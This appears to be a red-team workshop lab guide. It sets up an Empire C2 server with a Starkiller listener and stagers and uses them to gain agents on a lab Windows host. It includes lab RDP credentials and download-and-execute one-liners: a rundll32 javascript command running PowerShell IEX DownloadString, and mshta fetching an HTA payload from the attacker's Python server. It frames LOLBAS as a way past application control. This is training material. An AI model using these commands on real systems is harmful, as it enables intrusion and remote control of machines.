Lab 2: Empire Setup and Initial Agent
PreviousLab 1: Environment Orientation and Spinning upNextLab 3: Kerberoasting, Lateral Movement and DCSyncing
Last updated
Last updated
In this lab we will:
spin up Empire
connect to the Starkiller graphical user interface
create a listener
create a variety of stagers
RDP into our entrypoint system
execute a variety of stagers
interact with an agent and perform some situational awareness
Make sure that you are connected to the openvpn file that was created when you deployed the lab environment.
sudo openvpn student.ovpn
Your VPN connection should say something along the lines of Initialization sequence completed. It is of crucial importance to NOT terminate this terminal session.
Now that you are connected to the VPN take note of your tun0 adapter IP address. (this should be in the 10.8.0.0/24 region, typically 10.8.0.2). You can find the IP by opening up a new terminal tab or window and typing
ip addr show dev tun0
In this terminal window (or a seperate one, if you are forgetful about your IP), you can start your Empire server. Much like the VPN connection, this terminal session needs to remain active and should NOT be closed. You can start your Empire server by typing (you might need to change directories using the"cd" command to your empire location, such as /opt/Empire/
sudo ./ps-empire server
Eventually you should see something along the lines of
Open a web browser and browse to the following URL: http://localhost:1337/index.html#/, you will be greeted by the starkiller interface 😄
You can login to starkiller using the following credentials: Username: empireadmin Password: password123
Once logged on, you are conveniently dropped on the listener page. Please create a new listener by clicking on the orange create button on the top right.
Although you could create an HTTPS listener in Empire, for this workshop, we will be going with plain HTTP instead to reduce overhead. We cover HTTPS listeners in SEC565 🥁. When you clicked the create button, a new window will appear selecting the type of listener that you want, go ahead and select "http" from the dropdown list.
A new window appears allowing you to specify all kinds of details for your listener. Give your listener an appropriate name such as workshop-http-listener
In the Host field, replace the IP address with the IP address of your tun0 interface
Although port 80 is appropriate, you might already have something running on that port, so we will be picking port 8000 for this workshop.
After inserting all these values, press the orange submit button on the top right.
After creating a listener, we need a payload associated with it. This is typically called a "stager". In Starkiller you have two ways to create a stager, either on the of Starkiller or on the side. We will be using the sidebar approach
When you click on the stager button a new window will open, on the top you will see a new orange create button. Click it.
In the dropdown, you have a variety of cool options to weaponize a payload. For now, we will be sticking to the multi/launcher
Give the launcher an appropriate name such as workshop-launcher
Select the listener you created from the dropdown list (you should only have one option).
Press the orange submit button on the top right
In a real engagement you obviously need to get initial access through social engineering or exploitation. In this workshop we assume breach and are provided regular domain user credentials.
Some green buttons will be added to your top navigation after you click submit. We will be needing those in a moment 👍. First, open a new terminal tab or window and RDP into our entry point of our environment using xfreerdp, if xfreerdp is not installed on your system yet you can install it by opening a terminal window and typing
sudo apt install freerdp2-x11 -y
xfreerdp /v:10.0.10.20 /u:jross /p:'0nz2xQ44GumoWpl' +clipboard
Open up PowerShell in your rdp session and right click in the PowerShell prompt to copy your stager over and press enter to execute it
In Starkiller you should now see a new agent after you navigate to the chainlink icon on the left hand side, click on the agent name to interact with it.
We can now interact with our agent and execute shell commands or execute post exploitation tasks bundled with Empire. A nice task to run is some situational awareness like checking for any interesting processes using a third party tool called "SeatBelt" (ironically, our empire stager should be the only interesting process that will be returned). In the agent interaction window click on the dropdown and type seat, a suggestion will pop up showing the built-in seatbelt module. Click it.
After clicking on the seatbelt suggested module, some new options appear and a warning that this module is not OPSEC safe as Empire due to how Empire deals with C#. We get a new dropdown window with the command that we want to execute. We could go for -group=all but that takes a while to execute (feel free to do so though, just be patient while SeatBelt is doing its thing). For this particular exercise we'll stick to InterestingProcesses instead. After selecting it, click the submit button.
Navigate to the tasks tab to see the output of your previously executed task. Click on the dropdown button to see the output results.
A familiar process seems to be executing ... 😄
If you have time left, we can also launch some additional agents using a popular technique by adversaries, which is using Living off the Land Binaries and Scripts (LOLBAS). These binaries are present on your system by default and often carry the Microsoft signature which means they likely bypass controls like application control (applocker / wdac for instance).
Open up a new terminal window and create a staging directory - do not close the terminal window, we need it in a second.
mkdir staging
cd staging
In Empire, navigate back to your stagers and click on the three dots, and then copy to clipboard.
back in your terminal window use your favorite text editor (nano!) to create a new file and call it stager.ps1. For this workshop (and not to break the internet, I will be using gedit).
gedit stager.ps1
copy paste your stager in the new document and save it.
Back in your terminal window, start a python server on port 6666 (for evil!), again, do not close the terminal window as we need to keep the staging server alive.
python3 -m http.server 6666
Back in your RDP session to workstation01 (see step 18 if you closed your RDP session), open a command line prompt (NOT PowerShell). We will be using rundll32 (a crowd favorite), to pull our stager and launch another Empire agent. In the cmd window type the following hackerman command:
Replace the <your tun0 interface> in the command with the actual IP address!
rundll32.exe javascript:"..\mshtml.dll,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://<REPLACE BY YOUR TUN 0 ADAPTER IP >:6666/stager.ps1');")
Upon success, you will see that you will get a new hit on your python server, and a new agent in Empire!
For our final trick of this lab, let's create a new stager in HTA format. Click on the stager (suitcase) icon on the left hand side and click the orange create button.
Select windows_hta from the dropdown, give it a name and select your listener from the dropdown and click submit.
Click the paperclip icon again to copy the payload to your clipboard.
Navigate to your terminal where you are running the python server and stop it by pressing ctrl+c
let's create a new file and call it totallylegit.hta
gedit totallylegit.hta
copy your hta payload in there and save the file.
start your python server again
python3 -m http.server 6666
In your RDP session, invoke the following command from the cmd:
mshta http://10.8.0.2:6666/totallylegit.hta
a new hit should appear on your python web server terminal window and a new Empire agent will check in!
This concludes our lab, feel free to keep messing around if you still have time left! 🎉
Back in your Empire web UI, go ahead and click the green paperclip button
